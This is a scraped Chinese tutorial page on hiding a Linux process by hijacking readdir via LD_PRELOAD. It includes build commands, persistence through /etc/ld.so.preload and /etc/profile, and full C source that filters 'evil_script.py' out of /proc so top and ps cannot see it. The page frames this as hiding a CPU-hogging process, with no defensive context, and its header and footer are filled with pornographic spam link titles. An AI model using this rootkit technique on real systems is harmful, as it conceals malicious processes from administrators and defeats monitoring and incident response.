校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃

主頁 > 知識庫 > linux 下隱藏進(jìn)程的一種方法及遇到的坑

linux 下隱藏進(jìn)程的一種方法及遇到的坑

熱門標(biāo)簽:400電話申請找哪家公司 福州呼叫中心外呼系統(tǒng)哪家好 臨汾電銷機(jī)器人費(fèi)用 地圖標(biāo)注需要提交啥資料入駐 地圖標(biāo)注w是什么方向 河南省鄭州市地圖標(biāo)注 昆明外呼系統(tǒng) 新鄉(xiāng)人工智能電話機(jī)器人加盟 七大洲地圖標(biāo)注

前言

1.本文所用到的工具在 https://github.com/gianlucaborello/libprocesshider 可以下載

2.思路就是利用 LD_PRELOAD 來實(shí)現(xiàn)系統(tǒng)函數(shù)的劫持

LD_PRELOAD是什么:

LD_PRELOAD是Linux系統(tǒng)的一個環(huán)境變量,它可以影響程序的運(yùn)行時的鏈接(Runtime linker),它允許你定義在程序運(yùn)行前優(yōu)先加載的動態(tài)鏈接庫。這個功能主要就是用來有選擇性的載入不同動態(tài)鏈接庫中的相同函數(shù)。通過這個環(huán)境變量,我們可以在主程序和其動態(tài)鏈接庫的中間加載別的動態(tài)鏈接庫,甚至覆蓋正常的函數(shù)庫。一方面,我們可以以此功能來使用自己的或是更好的函數(shù)(無需別人的源碼),而另一方面,我們也可以以向別人的程序注入程序,從而達(dá)到特定的目的。

實(shí)現(xiàn)

1.下載程序編譯

bmfxgkpt-yhd:~# git clone https://github.com/gianlucaborello/libprocesshider.git
Cloning into 'libprocesshider'...
remote: Counting objects: 26, done.
remote: Total 26 (delta 0), reused 0 (delta 0), pack-reused 26
Unpacking objects: 100% (26/26), done.
bmfxgkpt-yhd:~# cd libprocesshider/
bmfxgkpt-yhd:~/libprocesshider# make
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
bmfxgkpt-yhd:~/libprocesshider#

2.移動文件到/usr/local/lib/目錄下

mv libprocesshider.so /usr/local/lib/

3.把它加載到全局動態(tài)連接局

echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload

測試

1.我們運(yùn)行evil_script.py

2.此時發(fā)現(xiàn)在top 與 ps 中都無法找到 evil_script.py

此時我們發(fā)現(xiàn) cpu 100%,但是卻找不到任何占用cpu高的程序

分析

#define _GNU_SOURCE
#include <stdio.h>
#include <dlfcn.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>
/*
 * Every process with this name will be excluded
 */
static const char* process_to_filter = "evil_script.py";
/*
 * Get a directory name given a DIR* handle
 */
static int get_dir_name(DIR* dirp, char* buf, size_t size)
{
  int fd = dirfd(dirp);
  if(fd == -1) {
    return 0;
  }
  char tmp[64];
  snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);
  ssize_t ret = readlink(tmp, buf, size);
  if(ret == -1) {
    return 0;
  }
  buf[ret] = 0;
  return 1;
}
/*
 * Get a process name given its pid
 */
static int get_process_name(char* pid, char* buf)
{
  if(strspn(pid, "0123456789") != strlen(pid)) {
    return 0;
  }
  char tmp[256];
  snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);
  FILE* f = fopen(tmp, "r");
  if(f == NULL) {
    return 0;
  }
  if(fgets(tmp, sizeof(tmp), f) == NULL) {
    fclose(f);
    return 0;
  }
  fclose(f);
  int unused;
  sscanf(tmp, "%d (%[^)]s", &unused, buf);
  return 1;
}
#define DECLARE_READDIR(dirent, readdir)                \

static struct dirent* (*original_##readdir)(DIR*) = NULL;        \

struct dirent* readdir(DIR *dirp)                    \

{                                    \

  if(original_##readdir == NULL) {                  \

    original_##readdir = dlsym(RTLD_NEXT, "readdir");        \

    if(original_##readdir == NULL)                 \

    {                                \

      fprintf(stderr, "Error in dlsym: %s\n", dlerror());     \

    }                                \

  }                                  \

  struct dirent* dir;                         \

  while(1)                              \

  {                                  \

    dir = original_##readdir(dirp);                 \

    if(dir) {                            \

      char dir_name[256];                     \

      char process_name[256];                   \

      if(get_dir_name(dirp, dir_name, sizeof(dir_name)) &&    \

        strcmp(dir_name, "/proc") == 0 &&            \

        get_process_name(dir->d_name, process_name) &&     \

        strcmp(process_name, process_to_filter) == 0) {     \

        continue;                        \

      }                              \

    }                                \

    break;                             \

  }                                  \

  return dir;                             \

}
DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);

1.程序定義了一個變量 process_to_filter 來控制不顯示哪個進(jìn)程名

2.重寫readdir,

strcmp(process_name, process_to_filter) == 0)

當(dāng)發(fā)現(xiàn)當(dāng)前進(jìn)程名稱與 process_to_filter 相同時,繼續(xù)循環(huán).

遇到的坑

1.某些Linux中這個程序編譯通不過

解決方法

刪除最后兩行中的一行

DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);

2.某些Linux中使用

shell echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
并不會生效
 此時我們需要配置環(huán)境變量
shell bmfxgkpt-yhd:~# vi /etc/profile
增加一行
shell export LD_PRELOAD=/usr/local/lib/libprocesshider.so

總結(jié)

以上所述是小編給大家介紹的linux 下隱藏進(jìn)程的一種方法及遇到的坑,希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時回復(fù)大家的。在此也非常感謝大家對腳本之家網(wǎng)站的支持!

標(biāo)簽:烏海 股票 臨沂 鎮(zhèn)江 岳陽 海口 紅河 四川

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《linux 下隱藏進(jìn)程的一種方法及遇到的坑》,本文關(guān)鍵詞  linux,下,隱藏,進(jìn)程,的,一種,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P(guān)信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《linux 下隱藏進(jìn)程的一種方法及遇到的坑》相關(guān)的同類信息!
  • 本頁收集關(guān)于linux 下隱藏進(jìn)程的一種方法及遇到的坑的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃
    久久99日本精品| 666欧美在线视频| 欧美女孩性生活视频| 欧美电影免费提供在线观看| 国产精品国产三级国产| 久久99国产精品麻豆| 91在线免费播放| 久久久久久久久岛国免费| 天天免费综合色| eeuss鲁片一区二区三区在线看| 欧美一区二区三区公司| 亚洲视频中文字幕| 国产.欧美.日韩| 欧美一区二区高清| 亚洲精品成人a在线观看| 成人激情小说网站| 精品国产乱码久久久久久图片| 亚洲成人av一区二区三区| 99综合电影在线视频| 国产女人18水真多18精品一级做| 麻豆国产精品官网| 欧美日韩在线三区| 亚洲综合一区在线| 91久久精品一区二区三| 中文字幕制服丝袜一区二区三区| 国产一区二区在线看| 欧美精品一区二区三区蜜桃视频| 天天亚洲美女在线视频| 欧美日韩国产影片| 亚洲成av人片在线| 欧美美女视频在线观看| 午夜欧美大尺度福利影院在线看| 在线精品视频一区二区三四| 一区二区三区在线视频免费观看| 99国产精品久久久久久久久久| 久久精品网站免费观看| 国产成人免费高清| 国产精品美女久久久久久2018| 成人a免费在线看| 国产精品激情偷乱一区二区∴| 成人综合在线观看| 成人免费一区二区三区在线观看| 北条麻妃一区二区三区| 亚洲欧美激情一区二区| 成人一区二区三区在线观看 | 国产99精品国产| 国产日韩三级在线| 大桥未久av一区二区三区中文| 国产精品美女久久久久久久网站| 不卡的电视剧免费网站有什么| 亚洲精品国久久99热| 欧美三级资源在线| 美国一区二区三区在线播放| 久久久久国产精品厨房| 成人网男人的天堂| 亚洲最新视频在线观看| 欧美日韩国产精品自在自线| 蜜臀av一区二区在线免费观看| 精品成人一区二区三区四区| 粉嫩嫩av羞羞动漫久久久| 亚洲欧美视频在线观看视频| 欧美巨大另类极品videosbest | 91在线精品一区二区三区| 一区二区三区欧美激情| 911国产精品| 国产精品66部| 亚洲一区二区美女| 日韩免费一区二区三区在线播放| 国产精品1区二区.| 亚洲图片一区二区| 久久久久久久综合色一本| 99久久精品久久久久久清纯| 天堂蜜桃91精品| 中文字幕精品一区二区三区精品| 在线这里只有精品| 国产一区二区三区久久悠悠色av | 成人免费毛片片v| 亚洲一区二区视频| 久久精品一区蜜桃臀影院| 欧美中文字幕亚洲一区二区va在线| 久久精品国产亚洲一区二区三区 | 午夜精品久久久久久久蜜桃app | 国产精品系列在线播放| 亚洲aⅴ怡春院| 国产女人水真多18毛片18精品视频| 欧美日韩精品欧美日韩精品一| 国产成人一级电影| 日本在线不卡视频一二三区| 日韩理论在线观看| 精品91自产拍在线观看一区| 在线免费观看视频一区| 国产盗摄视频一区二区三区| 日本网站在线观看一区二区三区| 自拍偷拍亚洲激情| 国产午夜精品理论片a级大结局| 欧美日韩精品是欧美日韩精品| 成人av网站在线观看免费| 久久99久久精品| 午夜精品一区二区三区电影天堂 | 91精品国产综合久久久蜜臀粉嫩 | 韩国女主播一区二区三区| 一区二区三区丝袜| 国产精品欧美久久久久无广告| 欧美成人在线直播| 欧美美女一区二区三区| 欧美日韩另类一区| 色婷婷综合久久| 一本久道久久综合中文字幕| jlzzjlzz欧美大全| 91看片淫黄大片一级在线观看| 狠狠色狠狠色综合系列| 久久精品国产99久久6| 视频一区国产视频| 肉丝袜脚交视频一区二区| 亚洲国产欧美日韩另类综合| 亚洲欧美在线视频观看| 国产精品久久久久一区二区三区共| 久久久综合视频| 久久久久久影视| 国产欧美日韩久久| 国产清纯在线一区二区www| 国产欧美一区二区三区鸳鸯浴| 久久天天做天天爱综合色| 久久久综合视频| 国产精品视频第一区| 中文字幕欧美日本乱码一线二线 | 亚洲欧美日韩小说| 亚洲激情五月婷婷| 一区二区成人在线视频| 亚洲综合av网| 五月激情六月综合| 麻豆极品一区二区三区| 国产一区二区按摩在线观看| 国产激情一区二区三区四区| 成人免费看的视频| 色噜噜夜夜夜综合网| 色综合一区二区三区| 欧美午夜精品免费| 欧美一区二区三区四区视频| 久久欧美一区二区| 亚洲人成在线观看一区二区| 亚洲国产aⅴ成人精品无吗| 同产精品九九九| 精品一区二区国语对白| 99精品一区二区| 欧美日韩色综合| 久久色中文字幕| 亚洲另类色综合网站| 日韩一区精品视频| 国产**成人网毛片九色| 91国偷自产一区二区开放时间| 91精品国产色综合久久久蜜香臀| 久久一日本道色综合| 亚洲精品伦理在线| 麻豆精品在线视频| www.亚洲在线| 日韩欧美aaaaaa| 亚洲视频在线一区观看| 久久精品国产免费看久久精品| av在线不卡免费看| 91精品国产福利| 亚洲同性gay激情无套| 久草在线在线精品观看| 97se亚洲国产综合自在线| 精品国产一区二区三区不卡| 亚洲精品视频在线| 国产aⅴ综合色| 在线成人免费视频| 国产精品久久久久久久久快鸭 | 国产欧美日韩在线视频| 香蕉加勒比综合久久| 处破女av一区二区| 777午夜精品视频在线播放| 欧美国产综合一区二区| 青青青爽久久午夜综合久久午夜| 91在线免费播放| 欧美经典一区二区三区| 蜜臂av日日欢夜夜爽一区| 在线免费精品视频| 一色桃子久久精品亚洲| 久久99久久99| 欧美丰满少妇xxxxx高潮对白| 国产精品传媒入口麻豆| 国产中文字幕一区| 69av一区二区三区| 亚洲国产裸拍裸体视频在线观看乱了 | 亚洲成人自拍网| 色综合中文字幕国产| 精品成人a区在线观看| 图片区小说区区亚洲影院| 在线影视一区二区三区| 中文字幕亚洲在| 成人黄色软件下载| 久久久久久久久伊人| 久久99精品国产麻豆婷婷| 欧美一级在线观看| 日韩国产精品久久久久久亚洲| 欧美丝袜丝交足nylons图片| 亚洲精品ww久久久久久p站| 9l国产精品久久久久麻豆|